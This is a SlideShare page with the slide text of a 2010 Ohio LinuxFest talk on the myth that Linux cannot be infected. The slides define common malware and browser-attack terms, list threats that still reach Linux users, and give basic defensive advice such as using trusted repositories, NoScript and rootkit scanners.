SlideShare uma empresa Scribd logo

Linux Security Myth: What Can Still Hurt Me

Mackenzie Morgan
Mackenzie Morgan

Mackenzie Morgan gave a presentation at Ohio LinuxFest 2010 about the Linux security myth. They discussed that while Linux is less vulnerable to viruses than Windows, it can still be affected by malware through email trojans, untrusted software from third-party repositories, and browser-based attacks. However, users can protect themselves by only installing software from trusted software sources, being cautious of launchers from unknown origins, and using browser plugins like NoScript to block malicious scripts.

Tecnologia
1 de 38
Baixar para ler offline
Linux Security Myth Mackenzie Morgan Ohio LinuxFest 2010 11 September 2010 Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 1 / 35
Introduction Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 2 / 35
Introduction Me Mackenzie Morgan Computer Science student Ubuntu Developer Kubuntu user http://ubuntulinuxtipstricks.blogspot.com ← find slides here Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 3 / 35
Introduction This Talk Linux Zealot: Try Linux! It doesn’t get viruses! Average Person: No viruses? I’m invincible! Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 4 / 35
Vocabulary Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 5 / 35
Vocabulary Malware Malware (or “badware”) is an umbrella term for viruses, trojans, worms, rootkits, etc. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 6 / 35
Vocabulary Virus Viruses infect individual files. They spread when people share those files. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 7 / 35
Vocabulary Social Engineering Social Engineering is tricking people into doing something that is bad for security. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 8 / 35
Vocabulary Trojan Trojans are malware that get installed via social engineering. . . or, well, lying. “I’m a fun game and totally safe! but not really, I’m actually going to steal your passwords. . . ” Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 9 / 35
Vocabulary Worm A worm infects other systems, automatically, usually over a network. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 10 / 35
Vocabulary Botnet A botnet is a group of systems infected by malware which operate as a collective and are controlled by a erm. . . jagoff. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 11 / 35
Vocabulary Botnet A botnet is a group of systems infected by malware which operate as a collective and are controlled by a erm. . . jagoff. Yes, I’m from Pittsburgh. How’d you guess? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 11 / 35
Vocabulary Rootkit A rootkit keeps the activities of an unauthorised user hidden so that you can’t tell your system has been owned. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 12 / 35
Vocabulary Keylogger A keylogger tracks everything you type. Yes, including passwords. It could be hardware (see ThinkGeek), but usually software. There are legitimate(-ish) uses. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 13 / 35
Vocabulary Browser-based Attack A browser-based attack is any attack that takes place inside the web browser. They are usually not limited to a specific OS. Examples: Cross-site Scripting (XSS) – using Javascript on one webpage to steal data from another Tracking cookies – harvests the information stored in your browser by other websites Cookie jacking – stealing credentials for other websites from your browser’s cookies Click jacking – hiding clickable objects on a webpage on top of other objects so that you’re not clicking what you think you’re clicking Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 14 / 35
Vocabulary Phishing Phishing is social engineering aimed at making you believe you are interacting with someone else whom you trust Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 15 / 35
What can still hurt me? Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 16 / 35
What can still hurt me? What’s still a problem? All of those Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 17 / 35
What can still hurt me? But what about no viruses? Windows ones usually won’t run, even in Wine Several hundred for Linux Only ∼30 in the wild ever No known viruses exploiting current vulnerabilities Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 18 / 35
What can still hurt me? Email Trojans “Check out this cool new game! http://example.com/foo.desktop” Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 19 / 35
What can still hurt me? Untrusted Software .deb for “screensaver” on gnome-look.org Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 20 / 35
What can still hurt me? Untrusted Software .deb for “screensaver” on gnome-look.org . . . and now you’re on a botnet http://ubuntuforums.org/showthread.php?t=1349678 Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 20 / 35
What can still hurt me? Browser-based attacks Unless only for Internet Explorer Firefox? Opera? Chrome? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 21 / 35
What can still hurt me? Phishing There’s no patch for gullibility Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 22 / 35
What can still hurt me? Rootkits If any of the previous work, the attacker might install one Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 23 / 35
What protection is there? Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 24 / 35
What protection is there? Trusted software sources Stick to your distro’s repos Otherwise, source directly from upstream Avoid non-software in .deb or .rpm format Heed warnings about failed signature checks Arch Linux does not sign packages Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 25 / 35
What protection is there? Launchers You get a .desktop from web/email. . . Do you know what it’ll run? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 26 / 35
What protection is there? Launchers You get a .desktop from web/email. . . Do you know what it’ll run? Could be anything Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 26 / 35
What protection is there? Launchers in KDE Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 27 / 35
What protection is there? Launchers in GNOME Fedora’s & openSUSE’s GNOME: Ubuntu’s GNOME: Ubuntu has a policy against “ignore this security warning” buttons Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 28 / 35
What protection is there? Browser - Javascript Use NoScript Users might not be equipped to know what to allow, but it blocks cross-site scripting & click-jacking Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 29 / 35
What protection is there? Browser - Encryption Don’t send passwords unencrypted! Lock icon: Means connection is encrypted and probably no man-in-the-middle NOT necessarily a sign that all is good! Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 30 / 35
What protection is there? Browser - Phishing But how do you know it’s the site it claims to be? Look at everything before the third slash—that’s the domain Check out this green thing Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 31 / 35
What protection is there? Minimal privileges Don’t login graphically as root! Why? Malware gets full access Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 32 / 35
What protection is there? Don’t need it? Don’t use it! Don’t login remotely with command line or push files to it? Uninstall your SSH and S/FTP servers Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 33 / 35
What protection is there? Detecting problems Find rootkits: rkhunter chkrootkit Warn of changes: tripwire Warn of attacks: snort These are advanced tools Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 34 / 35
What protection is there? Questions? Slides will be posted: http://ubuntulinuxtipstricks.blogspot.com Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 35 / 35

Recomendados

Is Linux Secure?
Is Linux Secure?Is Linux Secure?
Is Linux Secure?Mackenzie Morgan
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
Metaploit
MetaploitMetaploit
MetaploitAjinkya Pathak
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Hack beachpresetation
Hack beachpresetationHack beachpresetation
Hack beachpresetationYadev Jayachandran
 

Recomendados

Is Linux Secure?
Is Linux Secure?Is Linux Secure?
Is Linux Secure?Mackenzie Morgan
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
Metaploit
MetaploitMetaploit
MetaploitAjinkya Pathak
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Hack beachpresetation
Hack beachpresetationHack beachpresetation
Hack beachpresetationYadev Jayachandran
 
linux security: interact with linux
linux security: interact with linuxlinux security: interact with linux
linux security: interact with linuxAmmar WK
 
Security of Linux containers in the cloud
Security of Linux containers in the cloudSecurity of Linux containers in the cloud
Security of Linux containers in the cloudDobrica Pavlinušić
 
Linux Security
Linux SecurityLinux Security
Linux Securitynayakslideshare
 
How Many Linux Security Layers Are Enough?
How Many Linux Security Layers Are Enough?How Many Linux Security Layers Are Enough?
How Many Linux Security Layers Are Enough?Michael Boelen
 
Kernel Recipes 2013 - Linux Security Modules: different formal concepts
Kernel Recipes 2013 - Linux Security Modules: different formal conceptsKernel Recipes 2013 - Linux Security Modules: different formal concepts
Kernel Recipes 2013 - Linux Security Modules: different formal conceptsAnne Nicolas
 
Linux Security Scanning with Lynis
Linux Security Scanning with LynisLinux Security Scanning with Lynis
Linux Security Scanning with LynisMichael Boelen
 
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux SecurityRizky Ariestiyansyah
 
Introduction To Linux Security
Introduction To Linux SecurityIntroduction To Linux Security
Introduction To Linux SecurityMichael Boman
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for DevelopersMichael Boelen
 
Essential security for linux servers
Essential security for linux serversEssential security for linux servers
Essential security for linux serversJuan Carlos Pérez Pardo
 
Linux security
Linux securityLinux security
Linux securitysanchetanparmar
 
Linux security (outline)
Linux security (outline)Linux security (outline)
Linux security (outline)R.Harish Navnit
 
Linux Security best Practices with Fedora
Linux Security best Practices with FedoraLinux Security best Practices with Fedora
Linux Security best Practices with FedoraUditha Bandara Wijerathna
 
Linux security-fosster-09
Linux security-fosster-09Linux security-fosster-09
Linux security-fosster-09Dr. Jayaraj Poroor
 
Game cih
Game cihGame cih
Game cihHarsh Malpani
 
File System Implementation & Linux Security
File System Implementation & Linux SecurityFile System Implementation & Linux Security
File System Implementation & Linux SecurityGeo Marian
 
Torrent technology
Torrent technologyTorrent technology
Torrent technologyHarsh Malpani
 
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric VanderburgEthical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric VanderburgEric Vanderburg
 
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security OverviewShawn Wells
 
Linux security introduction
Linux security introduction Linux security introduction
Linux security introduction Mohamed Gad
 
Hacking 10 2010
Hacking 10 2010Hacking 10 2010
Hacking 10 2010Felipe Prado
 
Newstalk week 20/2014
Newstalk week 20/2014Newstalk week 20/2014
Newstalk week 20/2014Dusan Klinec
 

Mais conteúdo relacionado

Destaque

linux security: interact with linux
linux security: interact with linuxlinux security: interact with linux
linux security: interact with linuxAmmar WK
 
Security of Linux containers in the cloud
Security of Linux containers in the cloudSecurity of Linux containers in the cloud
Security of Linux containers in the cloudDobrica Pavlinušić
 
How Many Linux Security Layers Are Enough?
How Many Linux Security Layers Are Enough?How Many Linux Security Layers Are Enough?
How Many Linux Security Layers Are Enough?Michael Boelen
 
Kernel Recipes 2013 - Linux Security Modules: different formal concepts
Kernel Recipes 2013 - Linux Security Modules: different formal conceptsKernel Recipes 2013 - Linux Security Modules: different formal concepts
Kernel Recipes 2013 - Linux Security Modules: different formal conceptsAnne Nicolas
 
Linux Security Scanning with Lynis
Linux Security Scanning with LynisLinux Security Scanning with Lynis
Linux Security Scanning with LynisMichael Boelen
 
Introduction To Linux Security
Introduction To Linux SecurityIntroduction To Linux Security
Introduction To Linux SecurityMichael Boman
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for DevelopersMichael Boelen
 
Linux security (outline)
Linux security (outline)Linux security (outline)
Linux security (outline)R.Harish Navnit
 
File System Implementation & Linux Security
File System Implementation & Linux SecurityFile System Implementation & Linux Security
File System Implementation & Linux SecurityGeo Marian
 
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric VanderburgEthical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric VanderburgEric Vanderburg
 
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security OverviewShawn Wells
 
Linux security introduction
Linux security introduction Linux security introduction
Linux security introduction Mohamed Gad
 

Destaque (20)

linux security: interact with linux
linux security: interact with linuxlinux security: interact with linux
linux security: interact with linux
 
Security of Linux containers in the cloud
Security of Linux containers in the cloudSecurity of Linux containers in the cloud
Security of Linux containers in the cloud
 
Linux Security
Linux SecurityLinux Security
Linux Security
 
How Many Linux Security Layers Are Enough?
How Many Linux Security Layers Are Enough?How Many Linux Security Layers Are Enough?
How Many Linux Security Layers Are Enough?
 
Kernel Recipes 2013 - Linux Security Modules: different formal concepts
Kernel Recipes 2013 - Linux Security Modules: different formal conceptsKernel Recipes 2013 - Linux Security Modules: different formal concepts
Kernel Recipes 2013 - Linux Security Modules: different formal concepts
 
Linux Security Scanning with Lynis
Linux Security Scanning with LynisLinux Security Scanning with Lynis
Linux Security Scanning with Lynis
 
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux Security
 
Introduction To Linux Security
Introduction To Linux SecurityIntroduction To Linux Security
Introduction To Linux Security
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
 
Essential security for linux servers
Essential security for linux serversEssential security for linux servers
Essential security for linux servers
 
Linux security
Linux securityLinux security
Linux security
 
Linux security (outline)
Linux security (outline)Linux security (outline)
Linux security (outline)
 
Linux Security best Practices with Fedora
Linux Security best Practices with FedoraLinux Security best Practices with Fedora
Linux Security best Practices with Fedora
 
Linux security-fosster-09
Linux security-fosster-09Linux security-fosster-09
Linux security-fosster-09
 
Game cih
Game cihGame cih
Game cih
 
File System Implementation & Linux Security
File System Implementation & Linux SecurityFile System Implementation & Linux Security
File System Implementation & Linux Security
 
Torrent technology
Torrent technologyTorrent technology
Torrent technology
 
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric VanderburgEthical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
 
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview
2009-08-11 IBM Teach the Teachers (IBM T3), Linux Security Overview
 
Linux security introduction
Linux security introduction Linux security introduction
Linux security introduction
 

Semelhante a Linux Security Myth: What Can Still Hurt Me

Newstalk week 20/2014
Newstalk week 20/2014Newstalk week 20/2014
Newstalk week 20/2014Dusan Klinec
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetPrathan Phongthiproek
 
FOSDEM'08: TOMOYO Linux for Secure Embedded
FOSDEM'08: TOMOYO Linux for Secure EmbeddedFOSDEM'08: TOMOYO Linux for Secure Embedded
FOSDEM'08: TOMOYO Linux for Secure EmbeddedToshiharu Harada, Ph.D
 
Dan Guido SOURCE Boston 2011
Dan Guido SOURCE Boston 2011Dan Guido SOURCE Boston 2011
Dan Guido SOURCE Boston 2011Source Conference
 
P2 – explain the purpose of operating systems
P2 – explain the purpose of operating systemsP2 – explain the purpose of operating systems
P2 – explain the purpose of operating systemsJamesColwell
 

Semelhante a Linux Security Myth: What Can Still Hurt Me (7)

Hacking 10 2010
Hacking 10 2010Hacking 10 2010
Hacking 10 2010
 
Newstalk week 20/2014
Newstalk week 20/2014Newstalk week 20/2014
Newstalk week 20/2014
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load Target
 
Dissecting the Hack: Malware Analysis 101
Dissecting the Hack: Malware Analysis 101 Dissecting the Hack: Malware Analysis 101
Dissecting the Hack: Malware Analysis 101
 
FOSDEM'08: TOMOYO Linux for Secure Embedded
FOSDEM'08: TOMOYO Linux for Secure EmbeddedFOSDEM'08: TOMOYO Linux for Secure Embedded
FOSDEM'08: TOMOYO Linux for Secure Embedded
 
Dan Guido SOURCE Boston 2011
Dan Guido SOURCE Boston 2011Dan Guido SOURCE Boston 2011
Dan Guido SOURCE Boston 2011
 
P2 – explain the purpose of operating systems
P2 – explain the purpose of operating systemsP2 – explain the purpose of operating systems
P2 – explain the purpose of operating systems
 

Último

Digital Tools & AI in Career Development
Digital Tools & AI in Career DevelopmentDigital Tools & AI in Career Development
Digital Tools & AI in Career DevelopmentMahmoud Rabie
 
Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...
Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...
Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...itnewsafrica
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Nikki Chapple
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...Karmanjay Verma
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sector
4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sector4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sector
4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sectoritnewsafrica
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsYoss Cohen
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...amber724300
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructureitnewsafrica
 

Último (20)

Digital Tools & AI in Career Development
Digital Tools & AI in Career DevelopmentDigital Tools & AI in Career Development
Digital Tools & AI in Career Development
 
Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...
Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...
Irene Moetsana-Moeng: Stakeholders in Cybersecurity: Collaborative Defence fo...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sector
4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sector4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sector
4. Cobus Valentine- Cybersecurity Threats and Solutions for the Public Sector
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platforms
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
 

Linux Security Myth: What Can Still Hurt Me

  • 1. Linux Security Myth Mackenzie Morgan Ohio LinuxFest 2010 11 September 2010 Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 1 / 35
  • 2. Introduction Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 2 / 35
  • 3. Introduction Me Mackenzie Morgan Computer Science student Ubuntu Developer Kubuntu user http://ubuntulinuxtipstricks.blogspot.com ← find slides here Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 3 / 35
  • 4. Introduction This Talk Linux Zealot: Try Linux! It doesn’t get viruses! Average Person: No viruses? I’m invincible! Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 4 / 35
  • 5. Vocabulary Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 5 / 35
  • 6. Vocabulary Malware Malware (or “badware”) is an umbrella term for viruses, trojans, worms, rootkits, etc. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 6 / 35
  • 7. Vocabulary Virus Viruses infect individual files. They spread when people share those files. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 7 / 35
  • 8. Vocabulary Social Engineering Social Engineering is tricking people into doing something that is bad for security. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 8 / 35
  • 9. Vocabulary Trojan Trojans are malware that get installed via social engineering. . . or, well, lying. “I’m a fun game and totally safe! but not really, I’m actually going to steal your passwords. . . ” Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 9 / 35
  • 10. Vocabulary Worm A worm infects other systems, automatically, usually over a network. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 10 / 35
  • 11. Vocabulary Botnet A botnet is a group of systems infected by malware which operate as a collective and are controlled by a erm. . . jagoff. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 11 / 35
  • 12. Vocabulary Botnet A botnet is a group of systems infected by malware which operate as a collective and are controlled by a erm. . . jagoff. Yes, I’m from Pittsburgh. How’d you guess? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 11 / 35
